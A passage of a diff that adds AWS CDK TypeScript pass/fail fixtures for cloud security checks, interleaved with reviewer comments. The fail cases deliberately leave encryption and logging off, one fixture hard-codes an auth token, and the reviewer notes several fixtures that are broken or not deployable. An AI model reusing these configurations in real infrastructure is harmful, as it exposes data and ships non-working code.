Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const cfnCluster = new eks.CfnCluster(this, 'MyCfnCluster', { + resourcesVpcConfig: { + subnetIds: ['subnetIds'] + }, + roleArn: 'roleArn', + encryptionConfig: [{ + resources: ['secrets'] + }], + name: 'name', + version: 'version' + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ELBAccessLogs/fail.ts b/cdk_integration_tests/src/typescript/ELBAccessLogs/fail.ts new file mode 100644 index 00000000000..f38e3428145 --- /dev/null +++ b/cdk_integration_tests/src/typescript/ELBAccessLogs/fail.ts 
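Review bot: `encryptionConfig: [{ resources: ['secrets'] }]` has no `provider: { keyArn: ... }`, and envelope encryption of Kubernetes secrets needs a KMS key to encrypt with, so the pass fixture encodes a configuration that is accepted syntactically but is not a working control. I would make the pass case realistic — `encryptionConfig: [{ resources: ['secrets'], provider: { keyArn: 'arn:aws:kms:us-east-1:123456789012:key/EXAMPLE' } }]` — and consider whether the check should also require `provider.keyArn` (the policy source is outside this diff, so I cannot tell what it inspects). The placeholder values `subnetIds: ['subnetIds']` and `roleArn: 'roleArn'` are fine for parsing, but a `// placeholder values, not deployable` comment would stop a reader taking them literally.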
@@ -0,0 +1,18 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ec2 from 'aws-cdk-lib/aws-ec2'; +import * as elb from 'aws-cdk-lib/aws-elasticloadbalancing'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const vpc = new ec2.Vpc(this, 'VPC') + const lb = new elb.LoadBalancer(this, 'LB', { + vpc + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ELBAccessLogs/pass.ts b/cdk_integration_tests/src/typescript/ELBAccessLogs/pass.ts new file mode 100644 index 00000000000..535a9329061 --- /dev/null +++ b/cdk_integration_tests/src/typescript/ELBAccessLogs/pass.ts @@ -0,0 +1,20 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ec2 from 'aws-cdk-lib/aws-ec2'; +import * as elb from 'aws-cdk-lib/aws-elasticloadbalancing'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const vpc = new ec2.Vpc(this, 'VPC') + const lb = new elb.LoadBalancer(this, 'LB', { + vpc, accessLoggingPolicy: { + enabled: true + } + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ELBv2AccessLogs/fail.ts b/cdk_integration_tests/src/typescript/ELBv2AccessLogs/fail.ts new file mode 100644 index 00000000000..3d8462c5d66 --- /dev/null +++ b/cdk_integration_tests/src/typescript/ELBv2AccessLogs/fail.ts 
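Review bot: `accessLoggingPolicy: { enabled: true }` omits `s3BucketName`, which CloudFormation's `AccessLoggingPolicy` requires (and the CDK typing `CfnLoadBalancer.AccessLoggingPolicyProperty` marks non-optional, as far as I recall), so a classic ELB with this policy would fail to deploy; the fixture passes only because the check looks at `enabled`. Suggest `accessLoggingPolicy: { enabled: true, s3BucketName: 'my-elb-logs' }` so the pass case is a deployable example. The bucket also needs a policy granting the regional ELB log-delivery account `s3:PutObject`, which is outside a fixture's scope but worth a one-line comment so nobody copies this expecting logs to appear.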
@@ -0,0 +1,19 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ec2 from 'aws-cdk-lib/aws-ec2'; +import * as s3 from 'aws-cdk-lib/aws-s3'; +import * as elbv2 from 'aws-cdk-lib/aws-elasticloadbalancingv2'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const vpc = new ec2.Vpc(this, 'VPC') + const lb = new elbv2.ApplicationLoadBalancer(this, 'LB', { + vpc + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ELBv2AccessLogs/pass.ts b/cdk_integration_tests/src/typescript/ELBv2AccessLogs/pass.ts new file mode 100644 index 00000000000..74df7870b8c --- /dev/null +++ b/cdk_integration_tests/src/typescript/ELBv2AccessLogs/pass.ts @@ -0,0 +1,24 @@ +import * as cdk from 'aws-cdk-lib'; +import * as ec2 from 'aws-cdk-lib/aws-ec2'; +import * as s3 from 'aws-cdk-lib/aws-s3'; +import * as elbv2 from 'aws-cdk-lib/aws-elasticloadbalancingv2'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const vpc = new ec2.Vpc(this, 'VPC') + const loggingBucket = new s3.Bucket(this, 'loggingBucket', { + encryption: s3.BucketEncryption.S3_MANAGED, + }); + const lb = new elbv2.ApplicationLoadBalancer(this, 'LB', { + vpc + }); + + lb.logAccessLogs(loggingBucket); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtRest/fail.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtRest/fail.ts new file mode 100644 index 00000000000..6ba35ed897d --- /dev/null +++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtRest/fail.ts 
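Review bot: The pass case enables logging through the `lb.logAccessLogs(loggingBucket)` method call rather than a constructor prop, so this fixture is implicitly also a test that the CDK policy follows method invocations on the construct — if the graph only inspects `new ...(...)` arguments this would fail, and a comment stating that is deliberate would help the next maintainer. The bucket uses `s3.BucketEncryption.S3_MANAGED`, which is the right choice because ELB access-log delivery can only write to SSE-S3 buckets, not SSE-KMS; make that explicit with `encryption: s3.BucketEncryption.S3_MANAGED, // ELB log delivery does not support SSE-KMS`. `s3` is imported but unused in the sibling fail fixture.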
@@ -0,0 +1,16 @@ +import * as cdk from 'aws-cdk-lib'; +import {aws_elasticache as elasticache} from 'aws-cdk-lib'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', { + replicationGroupDescription: 'replicationGroupDescription', + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtRest/pass.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtRest/pass.ts new file mode 100644 index 00000000000..e1c3f49439e --- /dev/null +++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtRest/pass.ts @@ -0,0 +1,17 @@ +import * as cdk from 'aws-cdk-lib'; +import {aws_elasticache as elasticache} from 'aws-cdk-lib'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', { + replicationGroupDescription: 'replicationGroupDescription', + atRestEncryptionEnabled: true, + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransit/fail.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransit/fail.ts new file mode 100644 index 00000000000..6ba35ed897d --- /dev/null +++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransit/fail.ts 
@@ -0,0 +1,16 @@ +import * as cdk from 'aws-cdk-lib'; +import {aws_elasticache as elasticache} from 'aws-cdk-lib'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', { + replicationGroupDescription: 'replicationGroupDescription', + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransit/pass.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransit/pass.ts new file mode 100644 index 00000000000..90b5bbec7c3 --- /dev/null +++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransit/pass.ts @@ -0,0 +1,17 @@ +import * as cdk from 'aws-cdk-lib'; +import {aws_elasticache as elasticache} from 'aws-cdk-lib'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', { + replicationGroupDescription: 'replicationGroupDescription', + transitEncryptionEnabled: true + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/fail.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/fail.ts new file mode 100644 index 00000000000..6ba35ed897d --- /dev/null +++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/fail.ts 
@@ -0,0 +1,16 @@ +import * as cdk from 'aws-cdk-lib'; +import {aws_elasticache as elasticache} from 'aws-cdk-lib'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', { + replicationGroupDescription: 'replicationGroupDescription', + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass.ts new file mode 100644 index 00000000000..88c7cb06edf --- /dev/null +++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass.ts @@ -0,0 +1,18 @@ +import * as cdk from 'aws-cdk-lib'; +import {aws_elasticache as elasticache} from 'aws-cdk-lib'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', { + replicationGroupDescription: 'replicationGroupDescription', + transitEncryptionEnabled: true, + authToken: 'token' + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass_2.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass_2.ts new file mode 100644 index 00000000000..4f659d06f6b --- /dev/null +++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass_2.ts 
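Review bot: `authToken: 'token'` is a hard-coded credential literal and, beyond being a bad pattern for an example, it is shorter than ElastiCache's minimum AUTH token length (16 characters, as far as I recall), so the fixture would be rejected at deploy time; reference a secret instead, e.g. `authToken: cdk.SecretValue.secretsManager('redis-auth').unsafeUnwrap(), // never inline a real token`, or at least use an obviously fake 16+ character placeholder. The pairing of `transitEncryptionEnabled: true` with an auth token is the right thing for the check to require, since AUTH is only meaningful over TLS; a comment saying so would make the fixture self-explanatory.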
@@ -0,0 +1,18 @@ +import * as cdk from 'aws-cdk-lib'; +import {aws_elasticache as elasticache} from 'aws-cdk-lib'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', { + replicationGroupDescription: 'replicationGroupDescription', + authToken: 'token', + transitEncryptionEnabled: true, + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/fail.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/fail.ts new file mode 100644 index 00000000000..138b39f78ad --- /dev/null +++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/fail.ts @@ -0,0 +1,17 @@ +import * as cdk from 'aws-cdk-lib'; +import * as es from 'aws-cdk-lib/aws-elasticsearch'; +import * as opensearch from 'aws-cdk-lib/aws-opensearchservice'; +import {Construct} from 'constructs'; + +export class exampleStack extends cdk.Stack { + constructor(scope: Construct, id: string, props?: cdk.StackProps) { + super(scope, id, props); + const domain = new es.Domain(this, 'Domain', { + version: es.ElasticsearchVersion.V7_4 + }); + } +} + +const app = new cdk.App(); +new exampleStack(app, 'example-stack'); +app.synth(); diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/fail_2.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/fail_2.ts new file mode 100644 index 00000000000..b3febce0dd8 --- /dev/null +++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/fail_2.ts 
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import * as opensearch from 'aws-cdk-lib/aws-opensearchservice';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+ constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+ const domain = new opensearch.Domain(this, 'Domain', {
+ version: es.ElasticsearchVersion.V7_4
+ });
+ }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/pass.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/pass.ts
new file mode 100644
index 00000000000..e8e7c14606f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/pass.ts
@@ -0,0 +1,17 @@
+import * as cdk from 'aws-cdk-lib';
+import * as es from 'aws-cdk-lib/aws-elasticsearch';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+ constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+ const domain = new es.Domain(this, 'Domain', {
+ version: es.ElasticsearchVersion.V7_4,
+ enforceHttps: true
+ });
+ }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/pass_2.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/pass_2.ts
new file mode 100644
index 00000000000..04a16447c29
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainEnforceHTTPS/pass_2.ts
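Review bot: The `version: es.ElasticsearchVersion.V7_4` line in fail_2.ts references an `es` namespace the file never imports (only `opensearch` is imported), so the fixture is not valid TypeScript even if the check's parser accepts it; pass_2.ts in this directory and fail_2.ts/pass_2.ts under ElasticsearchDomainLogging carry the same line. For an `opensearch.Domain` the module's own enum is the natural value, `version: opensearch.EngineVersion.ELASTICSEARCH_7_4`, which also drops the dependency on the legacy elasticsearch module; otherwise add `import * as es from 'aws-cdk-lib/aws-elasticsearch';` as the sibling fail.ts does. If these fixtures are deliberately never compiled, a one-line header comment saying so would keep readers from copying them as working examples.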
@@ -0,0 +1,17 @@
+import * as cdk from 'aws-cdk-lib';
+import * as opensearch from 'aws-cdk-lib/aws-opensearchservice';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+ constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+ const domain = new opensearch.Domain(this, 'Domain', {
+ version: es.ElasticsearchVersion.V7_4,
+ enforceHttps: true
+ });
+ }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/fail.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/fail.ts
new file mode 100644
index 00000000000..138b39f78ad
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/fail.ts
@@ -0,0 +1,17 @@
+import * as cdk from 'aws-cdk-lib';
+import * as es from 'aws-cdk-lib/aws-elasticsearch';
+import * as opensearch from 'aws-cdk-lib/aws-opensearchservice';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+ constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+ const domain = new es.Domain(this, 'Domain', {
+ version: es.ElasticsearchVersion.V7_4
+ });
+ }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/fail_2.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/fail_2.ts
new file mode 100644
index 00000000000..b3febce0dd8
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/fail_2.ts
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import * as opensearch from 'aws-cdk-lib/aws-opensearchservice';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+ constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+ const domain = new opensearch.Domain(this, 'Domain', {
+ version: es.ElasticsearchVersion.V7_4
+ });
+ }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/pass.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/pass.ts
new file mode 100644
index 00000000000..75a421483ad
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/pass.ts
@@ -0,0 +1,19 @@
+import * as cdk from 'aws-cdk-lib';
+import * as es from 'aws-cdk-lib/aws-elasticsearch';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+ constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+ const domain = new es.Domain(this, 'Domain', {
+ version: es.ElasticsearchVersion.V7_4,
+ logging: {
+ appLogEnabled: true
+ }
+ });
+ }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/pass_2.ts b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/pass_2.ts
new file mode 100644
index 00000000000..ace545f9316
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchDomainLogging/pass_2.ts
@@ -0,0 +1,19 @@
+import * as cdk from 'aws-cdk-lib';
+import * as opensearch from 'aws-cdk-lib/aws-opensearchservice';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+ constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+ const domain = new opensearch.Domain(this, 'Domain', {
+ version: es.ElasticsearchVersion.V7_4,
+ logging: {
+ appLogEnabled: true
+ }
+ });
+ }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchEncryption/fail.ts b/cdk_integration_tests/src/typescript/ElasticsearchEncryption/fail.ts
new file mode 100644
index 00000000000..46d623cac8c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchEncryption/fail.ts
@@ -0,0 +1,13 @@
+// The code below shows an example of how to instantiate this type.
+// The values are placeholders you should change.
+import {aws_elasticsearch as elasticsearch} from 'aws-cdk-lib';
+
+const encryptionAtRestOptionsProperty1: elasticsearch.CfnDomain.EncryptionAtRestOptionsProperty = {
+ enabled: false,
+ kmsKeyId: 'kmsKeyId',
+};
+
+let encryptionAtRestOptionsProperty2: elasticsearch.CfnDomain.EncryptionAtRestOptionsProperty = {
+ enabled: false,
+};
+
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchEncryption/fail2.ts b/cdk_integration_tests/src/typescript/ElasticsearchEncryption/fail2.ts
new file mode 100644
index 00000000000..1f21305d959
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchEncryption/fail2.ts
@@ -0,0 +1,15 @@ +import {aws_elasticsearch as elasticsearch} from 'aws-cdk-lib'; + +const domain = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', { + encryptionAtRestOptions: { + enabled: false, // Enable encryption at rest + kmsKeyId: 'your-KMS-key-ID', // Specify your KMS key ID + } +}); + +const domain2 = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', { + encryptionAtRestOptions: { + enabled: false, // Enable encryption at rest + } +}); + diff --git a/cdk_integration_tests/src/typescript/ElasticsearchEncryption/pass.ts b/cdk_integration_tests/src/typescript/ElasticsearchEncryption/pass.ts new file mode 100644 index 00000000000..b16abdfb13b --- /dev/null +++ b/cdk_integration_tests/src/typescript/ElasticsearchEncryption/pass.ts @@ -0,0 +1,20 @@ +import * as cdk from 'aws-cdk-lib'; +import * as elasticsearch from 'aws-cdk-lib/aws-elasticsearch'; + + +const domain = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', { + encryptionAtRestOptions: { + enabled: true, // Enable encryption at rest + kmsKeyId: 'your-KMS-key-ID', // Specify your KMS key ID + }, +}); + +const domain3 = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', { + encryptionAtRestOptions: { + enabled: true, // Enable encryption at rest + } +}); + +const encryptionAtRestOptionsProperty3: elasticsearch.CfnDomain.EncryptionAtRestOptionsProperty = { + enabled: true, +}; diff --git a/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/fail.ts b/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/fail.ts new file mode 100644 index 00000000000..82f51c622a7 --- /dev/null +++ b/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/fail.ts 
@@ -0,0 +1,12 @@
+// The code below shows an example of how to instantiate this type.
+// The values are placeholders you should change.
+import { aws_elasticsearch as elasticsearch } from 'aws-cdk-lib';
+
+const encryptionAtRestOptionsProperty1: elasticsearch.CfnDomain.NodeToNodeEncryptionOptionsProperty = {
+ enabled: false,
+};
+
+let encryptionAtRestOptionsProperty2: elasticsearch.CfnDomain.NodeToNodeEncryptionOptionsProperty = {
+ enabled: false,
+};
+
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/fail2.ts b/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/fail2.ts
new file mode 100644
index 00000000000..5cccf5fb078
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/fail2.ts
@@ -0,0 +1,15 @@
+import { aws_elasticsearch as elasticsearch } from 'aws-cdk-lib';
+
+const domain = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', {
+ nodeToNodeEncryptionOptions: {
+ enabled: false, // Enable encryption at rest
+ kmsKeyId: 'your-KMS-key-ID', // Specify your KMS key ID
+ }
+});
+
+const domain2 = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', {
+ nodeToNodeEncryptionOptions: {
+ enabled: false, // Enable encryption at rest
+ }
+});
+
diff --git a/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/pass.ts b/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/pass.ts
new file mode 100644
index 00000000000..5d7d7e27f5f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticsearchNodeToNodeEncryption/pass.ts
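Review bot: In fail2.ts the `nodeToNodeEncryptionOptions` block carries `kmsKeyId: 'your-KMS-key-ID'`, which is not a property of the domain's node-to-node encryption options (that structure only has `enabled`), and its trailing comment `// Enable encryption at rest` describes a different setting; both look carried over from the ElasticsearchEncryption fixture, as do the `encryptionAtRestOptionsProperty1`/`2` names given to `NodeToNodeEncryptionOptionsProperty` values in fail.ts. The same stale comment appears twice in pass.ts of this directory. I'd drop the `kmsKeyId` line and change the comments to `// Enable node-to-node encryption`, so the fixture exercises only the property this check is about.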
@@ -0,0 +1,17 @@
+import { aws_elasticsearch as elasticsearch } from 'aws-cdk-lib';
+
+const domain = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', {
+ nodeToNodeEncryptionOptions: {
+ enabled: true, // Enable encryption at rest
+ },
+});
+
+const domain3 = new elasticsearch.CfnDomain(this, 'MyElasticsearchDomain', {
+ nodeToNodeEncryptionOptions: {
+ enabled: true, // Enable encryption at rest
+ }
+});
+
+const encryptionAtRestOptionsProperty3: elasticsearch.CfnDomain.NodeToNodeEncryptionOptionsProperty = {
+ enabled: true,
+};
diff --git a/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/fail.ts b/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/fail.ts
new file mode 100644
index 00000000000..338cd5710f0
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/fail.ts
@@ -0,0 +1,32 @@
+// The code below shows an example of how to instantiate this type.
+// The values are placeholders you should change.
+import {aws_glue as glue} from 'aws-cdk-lib';
+
+const cfnDataCatalogEncryptionSettingsProps1: glue.CfnDataCatalogEncryptionSettingsProps = {
+ catalogId: 'catalogId',
+ dataCatalogEncryptionSettings: {
+ connectionPasswordEncryption: {
+ kmsKeyId: 'kmsKeyId',
+ returnConnectionPasswordEncrypted: false,
+ },
+ encryptionAtRest: {
+ catalogEncryptionMode: 'DISABLED',
+ catalogEncryptionServiceRole: 'catalogEncryptionServiceRole',
+ sseAwsKmsKeyId: 'sseAwsKmsKeyId',
+ },
+ },
+};
+
+let cfnDataCatalogEncryptionSettingsProps2: glue.CfnDataCatalogEncryptionSettingsProps = {
+ catalogId: 'catalogId',
+ dataCatalogEncryptionSettings: {
+ connectionPasswordEncryption: {
+ returnConnectionPasswordEncrypted: true,
+ },
+ },
+ encryptionAtRest: {
+ catalogEncryptionMode: 'DISABLED',
+ catalogEncryptionServiceRole: 'catalogEncryptionServiceRole',
+ sseAwsKmsKeyId: 'sseAwsKmsKeyId',
+ },
+};
\ No newline at end of file
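Review bot: In the second object of GlueDataCatalogEncryption/fail.ts, `encryptionAtRest` sits as a sibling of `dataCatalogEncryptionSettings` instead of inside it, so under `CfnDataCatalogEncryptionSettingsProps` it is an unknown top-level key and the settings block has no `encryptionAtRest` at all. The fixture then fails (if it fails) because the block is missing rather than because `catalogEncryptionMode: 'DISABLED'` is set, which is presumably the condition it was written to cover, and a check that only inspects values that are present would not flag it. Moving the `encryptionAtRest: { ... }` block inside `dataCatalogEncryptionSettings`, as the first object and fail2.ts already do, restores the intended case.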
diff --git a/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/fail2.ts b/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/fail2.ts new file mode 100644 index 00000000000..ec4a7c8787f --- /dev/null +++ b/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/fail2.ts @@ -0,0 +1,31 @@ +import { aws_glue as glue } from 'aws-cdk-lib'; + +const cfnDataCatalogEncryptionSettings = new glue.CfnDataCatalogEncryptionSettings(this, 'MyCfnDataCatalogEncryptionSettings', { + catalogId: 'catalogId', + dataCatalogEncryptionSettings: { + connectionPasswordEncryption: { + kmsKeyId: 'kmsKeyId', + returnConnectionPasswordEncrypted: false, + }, + encryptionAtRest: { + catalogEncryptionMode: 'SSE-KMS', + catalogEncryptionServiceRole: 'catalogEncryptionServiceRole', + sseAwsKmsKeyId: 'sseAwsKmsKeyId', + }, + }, +}); + +const cfnDataCatalogEncryptionSettings2 = new glue.CfnDataCatalogEncryptionSettings(this, 'MyCfnDataCatalogEncryptionSettings', { + catalogId: 'catalogId', + dataCatalogEncryptionSettings: { + connectionPasswordEncryption: { + returnConnectionPasswordEncrypted: true, + }, + encryptionAtRest: { + catalogEncryptionMode: 'DISABLED', + catalogEncryptionServiceRole: 'catalogEncryptionServiceRole', + sseAwsKmsKeyId: 'sseAwsKmsKeyId', + }, + }, +}); + diff --git a/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/pass.ts b/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/pass.ts new file mode 100644 index 00000000000..4c2afb41366 --- /dev/null +++ b/cdk_integration_tests/src/typescript/GlueDataCatalogEncryption/pass.ts 
